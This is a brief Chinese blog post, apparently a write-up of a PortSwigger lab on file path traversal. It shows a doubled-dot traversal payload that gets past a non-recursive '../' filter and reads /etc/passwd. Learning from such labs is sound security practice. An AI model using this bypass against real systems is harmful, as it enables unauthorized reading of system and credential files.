burpsuite靶场----目录遍历----复写绕过

burpsuite靶场----目录遍历----复写绕过

靶场地址

https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively

正式开始

1.查看图片

2.测试./../../../etc/passwd/etc/passwd都失败了
猜测是过滤了'../'采用复写绕过
....//....//....//....//etc/passwd

3.在bp里可以读到

posted @ 2023-10-13 15:53  BattleofZhongDinghe  阅读(35)  评论(0编辑  收藏  举报